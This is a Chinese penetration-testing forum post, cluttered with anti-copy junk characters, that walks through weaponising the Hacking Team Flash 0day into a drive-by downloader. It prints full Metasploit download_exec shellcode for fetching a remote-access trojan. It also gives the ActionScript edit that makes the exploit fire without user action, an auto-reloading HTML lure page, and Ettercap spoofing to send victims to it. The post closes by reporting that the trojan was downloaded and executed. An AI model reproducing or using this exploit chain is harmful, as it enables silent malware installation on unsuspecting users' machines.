中国网络渗透测试联盟

标题: flash 0day之手工代码修改制作下载者实例入侵演示 [打印本页]
作者: admin    时间: 2018-10-20 20:28
标题: flash 0day之手工代码修改制作下载者实例入侵演示

6 A/ U" u& \% n& z% S 三、flash 0day之手工代码修改制作下载者实例入侵演示 ' e, b+ x7 j5 [# n5 b

# t. X o% p! a3 h0 M8 W

" Q0 w4 N( Q& ]/ y3 U 利用到的工具: + F( z: `. N9 U% g" d: h; u0 |

# h6 _" O% o' r

* u, @4 H/ ]' P& y' p Msf 2 |- w4 l# }2 j+ `0 I) ]

& q0 X9 F8 Y" J' P ]9 K/ R3 \

: x( ]$ Z0 k- K3 e Ettercap ! F+ S7 R: p3 [! r: @& u" c5 e

' H* k$ l* w9 X9 T6 i7 y1 A

/ w( ~; B4 T2 H! F3 \+ Q Adobe Flash CS6 % B/ z% g4 }% D" W

9 u$ r# ]7 s0 L4 g- n* z% e

+ g2 b) X8 A% Y4 ~1 l Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 7 l- w% I6 [! \2 H3 ]1 I

/ r o0 i7 R6 F/ [+ f, z

& v' P5 }8 x$ B: A. R; V; e$ x 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options , b8 x* x& L, u4 ]

7 k# k7 ^1 ~! [8 f7 N

. i9 Q% _; q: }' G 如图: $ I" h' b. H n6 i! U+ \

1 _7 B2 A9 F: w& G* |

, ?, ~' M+ `! Y   - @; p* |2 F4 s) n4 c Z: B9 A

?* `* F" P4 p

) x u* W! {* h   2 R/ w$ w; T+ I7 k2 I* s

9 W6 L8 U( Q: \+ ?: ?+ e5 |

. a) D. o+ W) h* P 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: - k( K# \5 m1 N; }- v8 M) O: Q0 u

8 `- A5 P4 T" I1 ?/ n: c6 R

+ c* L! c: ^; P/ C- A% F$ _   % b; z& F* g1 ^

* ?& h) C l m+ }

1 q- h* ?- h8 ^% P# T$ y* E j   . O$ C: _" V: [' I8 o+ M5 i" G q

. H# |1 C1 ^" @- Q

0 ~, q0 n$ z3 |$ l/ O 然后执行generate -t dword生成shellcode,如下: $ m- E& X$ J% n+ K$ U6 q

! x, y7 b) B7 R# H! I9 R' }! R

7 V8 u8 c8 a$ {3 }1 r" L   4 S: I2 M1 e' s. ^

. L* H& r- q3 z! z! K

% S( P! T7 a/ a) I- J9 f/ G6 N 复制代码到文本下便于我们一会编辑flash exp,如下: + u6 \3 {; l) Z2 k" Y7 J9 x

/ K: z1 |5 f( S! H* j" H3 X

1 R' q9 U7 I, }; n, k: l& t- u 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, % U) ~0 {' k2 ?* V

2 B4 Z" f0 t2 z; N+ M7 i# g# h$ U- Z

0 z4 s* A5 T" w$ R" m 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ' ?, L6 Y! Q/ Y9 F

% f( U' y9 V, h) N

; L" ~. L; ^; |0 Z x9 X- S. w% B 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 9 f9 L+ J8 U' g# r( S" X

+ O& C+ Z7 B9 ?) t' W% `

. W* ~) L& k' g) O5 j+ S# ~1 @, n 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 6 Y3 c$ V# r+ r( ]& Z# j: e5 J

' y$ f" Q9 z5 i' m

* n y" l$ v- F) S1 ]: f 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ; z g) f) r9 c% @% v

4 P3 ]& H: X3 K7 H! U' m- a2 o5 [3 @" ]5 s

/ T# j) D% h9 i8 m9 G 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, ; ^8 k+ n8 I9 f+ @( L$ F4 \

8 G# ?: F! q6 E

% E0 X$ U X+ L. c+ i 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 3 V# z7 ?" {" V7 N7 p

7 l/ M" V' w0 g8 G$ ~

8 a4 s- G. l7 T. r 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ' o. g* r9 {/ y

6 I7 l: g8 A3 B1 F" a' @9 ~

- ^4 q( S9 k D( o4 z 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ) }% r- g5 u! R0 a/ [. g+ N4 A

1 I4 d m; f( _

# i' a6 K4 S, G+ @* D9 T 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, & Q2 ?4 E9 P q, N' m9 [$ F

/ t$ C# O3 w- l; o* Y

% y- o6 t" _; \6 Y0 O4 |/ K. j 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, " j5 K# v" T. c, w9 M9 y4 ?

. m1 X7 D5 M( W

/ W$ E! m8 P! d, m' Q# t$ t/ P, p0 u$ K 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, + r% H2 k+ M* z! I7 ]7 x

' g! B% H* M& {' }+ u* ?

) Y" N R9 _4 y3 v4 w& S$ `/ R D 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, . n1 l( h1 Z3 H! d j [

7 a R+ m+ t0 Z1 _+ l

- {: m8 u) K1 n1 K6 l" ]8 _ 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 + \: [( q4 Y4 F- q

; ~ s2 h7 \8 r

6 g9 l- T l5 i' S/ r' D2 g   * ?1 J. R/ l, ^1 P. R% B) X% H

9 H& V7 t$ y9 B& [2 |" d% V

/ B' f0 l5 `5 ?& {   1 q8 k+ }! y& A) m! a7 @3 Y- a

9 ~" D+ i5 |3 C) f

/ _$ c' X% {( X9 w0 O- u 下面我们来修改flash 0day exp,需要修改三个文件,分别为: ) [. u& H+ m6 {; S" s

6 v* T* t4 E3 P0 t# { ]: M- C4 U# J

$ Q1 w' z% S5 C- u& A- y   * n0 d" v# v3 u& K# {

$ y) T0 T) O6 \9 x8 t7 X. Y% J9 |

, O0 L: c3 w$ n7 R% Y3 k 先修改ShellWin32.as,部分源代码如图: 8 X3 O1 K, o+ G, J' q9 K

& O1 F |( o) X2 h! Z

! Q0 I* w* R* ^- L( Q   - B5 U" Z0 Y0 X' H

1 ?# h# U" N6 ]* V

3 U+ w* [- l* o- ]6 A 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: - V$ x. R6 N- P: {6 @& L

* U, ]& Z7 d% c3 m, \9 F5 {

+ }4 f+ t" g; a$ D. ~' _   ( m6 A- E4 W% |# l9 s

) U. A( }7 x0 X5 {* ]% A( y1 R/ X

, P+ x, M5 N/ `; |4 `& U) i& [' ~, z/ p 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 8 ^9 Y& ]0 c4 z: G

2 i7 D1 X. k0 N/ y/ ]: a

' K) q. c0 P; ^0 a0 y! ]   * B, a" L- M( q3 ^$ I! B* r

, p& q: {. M8 s# {

1 l5 N8 o) ~. A7 b% A* K! i2 D 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: * ]2 F u* J3 p

3 g6 Z# p+ ^- ~

! D+ M" L$ F" m5 h! H   : H, C. Q. G' S0 @' J

) H$ M" K% f* ?

' A$ [: [2 I W- q/ Q1 x   1 i- g& f ?- h9 N4 n" n# V( U

6 D6 c$ ~& T$ T8 y, C2 B, x

. e; L/ g9 [7 G& ^! O/ \   , o9 C2 U& `2 t% R9 N5 ~

7 B2 |% D5 E3 _9 @3 q* Q

; D1 [( [( a0 h7 O3 G% V 然后点保存,下面我们来编译一下,打开 " _' T& } n- z+ @- O8 q

; u( y6 H& S/ F9 N' ?

0 r/ M# t) U* ?& ^+ p% l" S exp1.fla然后点文件-发布,看看编译没错误 ( R$ h J" V1 U$ R# G% ]

* O) p% g6 O* p* Z( h

( }0 G# `5 F" l# T   $ C, R& D, l* A0 W7 n

, {/ h1 N+ ^; h$ f* t: a+ o4 B. _

; B: i( e* P' Y, r. |& t9 I; O   2 p( a% p1 r% O) u/ Z

+ G/ t& }* h; D5 A. C" y5 _

3 a: I, ^' ?+ z) B; M& i, y- e8 y   2 s, {) \' @8 {' Z- j; }; ^

+ W, z. C% i* ?0 {6 h

5 e5 V' u$ K( ?- w% _+ @/ _   * G( I7 ?3 s; s3 x; n

7 A! s C* }" G6 P

! W* w- w1 [1 t5 A 然后我们把生成的 V0 x* C! Q" K% m5 I* S a7 T

+ n; ^$ d* A0 f3 C5 @

- x! B8 `- p) d$ |7 | exp1.swf丢到kailinux /var/www/html下: 7 r( n) R6 H: K7 e; k

$ B2 W$ Q3 B5 v6 B+ t# A+ c

# ^5 Q( E; m3 d* i5 _ 然后把这段代码好好编辑一下 6 g# T4 {, T" \

4 p, F+ H9 n5 f! d: \4 t8 S

9 k+ p) r$ c4 D   8 W( U6 h! r6 X

& S- y5 m" p$ r [

0 M$ c1 ]: c9 W# R3 K   + [! P- X8 e, w9 \0 g

' C, ~2 v/ H, F" `6 A7 J

1 C8 ?! Q7 Y+ i" W! W( P4 m   8 j) w5 A: M; d6 ~1 G

* z4 Q; |" r ~( |

" N {6 `5 `* l' m7 g9 n   ; v" f2 W. c7 o( g

5 `, N7 [2 }. n2 F0 j3 N

$ d }6 B# y3 m$ t* v. G& d- D   ; E7 d3 H5 k& l( y

a9 h. ^+ T9 F3 G$ h

) G) W1 F: A+ U! `# r   & z3 d' U( Q0 c$ @% D' o, \

% U' K6 l" w; y% R& ?2 d8 U+ F

; U. y5 R8 \4 ?' A o" z/ D B <!DOCTYPE html> 2 J$ W# `. ]8 V+ {

% s8 ?4 z% w" E& S3 Q# Z. d

% `/ d, `- c" {/ P; W A. | <html> , B. x2 N) d2 o

8 u* q. }( ~9 E; Q- J1 B9 _

5 g6 n- O! n7 u" C( N% Q6 Y <head> . `4 A s% H) n$ T/ d3 |

$ g! i7 `/ v5 b) Q1 b9 Y# j C

7 E" `3 V- H$ i8 ~0 ? <meta http-equiv="Content-Type" content="text/html; ; t. W& k% z! X' H! X

4 E7 b+ @+ ^8 N: H

4 l& u" E) k0 L charset=utf-8"/> 1 A# t0 d5 k s! @

$ C$ C! f6 B0 s$ }4 }3 K) b

E$ o, |& k: e( J3 ?* J- B# R* }6 e </head> ! d8 C S3 W: T. |1 ]; ~# o! d e

8 H( h) ?* V6 a0 Q0 `0 g1 ?, U, X

$ S# w$ r- O; r5 ~. w) L! A <body> 2 F: f9 Z+ n# y, r: B5 H2 m. g3 e6 b

6 c4 N( l* N3 s$ n C1 M3 A* A

+ o w0 i. {' x <h2> Please wait, the requested page is loading...</h2> . N0 F( e2 Z3 F- q+ ^' [: P3 c; w9 ]

7 F& O4 ]3 r( w! c

8 c: S6 ]6 \+ ~5 [ <br> 6 r2 r) ]# t, c% _0 b) O

# A o9 h( {; F" `5 ^; R

2 X* Q2 S$ U6 ?* ?3 B" ~ <OBJECT . C- j B3 I4 n) G1 T+ T

: e1 }1 w% u$ S

# w4 \4 `2 f& j8 _ classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie # j7 o' t7 g6 S4 q8 Z9 S* R v

) Y4 g/ M0 P0 A6 x6 f! d

# B( S) _0 D6 x8 f0 Z+ V8 L7 ~ VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ! `, }8 y8 v, G* \

8 n& w) f9 }; S' g" h- B

% u$ F0 ^' O9 K6 }0 ` </body> 1 \9 l/ U0 z3 R; S; _- W

) M: |8 K) r s

7 E- }7 f) {) h2 r; V$ U5 J- U" } <script> t* q# Y3 W( S

9 N4 [- d T8 B

Z6 o' T: o7 n; O8 s1 u9 y0 X     setTimeout(function () { 7 F5 W: H2 r/ I. A0 {- j4 ^% K& O. B

, x. h" L* G* q: T3 l @/ I. Q

: }9 x2 @* L5 ~9 t          / N) h- j8 R2 D+ q

5 t' O- K; N4 t! X3 ?& a0 q0 j6 l" A

. x5 ^. F& W1 k0 A2 s; g" t window.location.reload(); $ h- m% f" l0 t) t( u2 c1 V; C

q' g" Z7 q& L5 ^; |9 q. `

+ x2 P* L5 Q6 T! K/ l     }, 10000); ' P) |( n; ^) F4 ?# ~. l4 s0 O0 V

9 r) K; M D1 V

; N: I& e' q! Z, S3 h   0 h) H8 b) K9 L, G% N! Q

. I3 Q$ [4 s1 W- _; f

6 k. u& {* t4 V </script> 1 o$ w# R' w# ^6 o

& R7 [; [) p) [" o

! q6 P3 c7 `& i </html> # J1 f* ?: M% g

' \* P9 k" N- Y0 n2 p+ }

Z5 t# J- \' _, I7 t   " A8 [8 O7 Q* ^+ u4 W6 J8 \4 V3 A

- I* e0 F* J% x$ Z O- S7 P

' ]' p1 Y& ?: s2 r/ D" T! {% L! I" b 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ; D1 l6 C, c# k7 D- V. M b$ |

, o! u. Y& }3 u' y9 w9 u/ L# U

) d* h/ C' Y5 ?, {. o& \   8 ?( b1 J q1 k# u, v& a

7 A' r8 Z% |! S9 k2 h) y

8 p0 r, ]' c5 [9 h) ?7 l t   7 F% V" s5 S" e* M8 i: ^

# Q8 k" X/ Q% h9 ]. n/ z+ {8 r

2 W( ]# |5 `% R/ _, j4 T   - k, z/ {# K4 \+ G" `. O7 B+ A$ ?

# I- F! N9 [7 S

* A2 H" Z# d3 W1 p6 X1 d* D. M   ; S1 q6 {' r4 f7 I" @

, @" M# O4 I+ o

9 L: ^1 |; H4 k3 ]& f   # i9 G3 S0 ^! q2 G2 ?$ k4 i( A

9 V4 \- i* c. b

?' A& @/ K; i7 `/ _* V 下面我们用ettercap欺骗如图: 2 k$ q. ?! v3 n! P5 E+ D$ w- H

1 Z, l1 a5 G1 B% c( I

6 k" Y* s! {/ `1 z! ~5 ^' G   4 V8 @! B A' L

2 ]& P9 K& E7 b7 E/ H' q2 ~

- @1 y- p) f# H# o$ O   7 g; r+ b& m6 C" }$ M

% a* L+ ^5 t+ g1 T

/ L& n" ]% v3 h6 |: ?6 A 下面我们随便访问个网站看看: I# p+ g# j7 W8 t3 Q7 C

( j6 u. t# o) P5 l# q9 b2 C7 I

" m* r' j4 q, a+ p% h" W% k 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 8 k' j& S* \7 _. M8 G% L' L

3 j; K7 r" R% R |' H0 C, q

8 F" I/ D. d+ d5 M   $ K, u7 Y+ H& `5 v! b" R* t7 [9 T, `

! E _. `$ x" N' d7 }

9 j) ]: [# b! X, L$ `) ` 我们看另一台, . g* W5 r Q' | J8 o+ n2 G

0 e. }1 V, W& p; M

/ Z3 C! p X+ z+ H( | 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 7 \5 e+ \) D' g0 |" j





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2